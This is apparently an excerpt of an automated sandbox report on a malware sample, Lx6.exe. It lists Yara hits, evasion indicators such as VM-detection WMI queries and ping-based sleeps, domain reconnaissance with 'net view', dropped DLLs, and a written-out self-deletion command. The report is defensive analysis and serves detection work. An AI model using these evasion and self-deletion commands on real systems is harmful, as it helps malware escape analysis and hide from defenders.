Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Self deletion via cmd or bat file

Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe			Jump to behavior

Source: C:\Users\user\Desktop\Lx6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Users\user\Desktop\Lx6.exe TID: 4728	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe TID: 4728	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4888	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4888	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\Lx6.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\cmd.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9749			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5459

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain

Source: C:\Users\user\Desktop\Lx6.exe	API coverage: 8.0 %
Source: C:\Windows\SysWOW64\cmd.exe	API coverage: 3.7 %

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Domain FROM Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jxpjpfgv.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iyr5jfx4.dll	Jump to dropped file
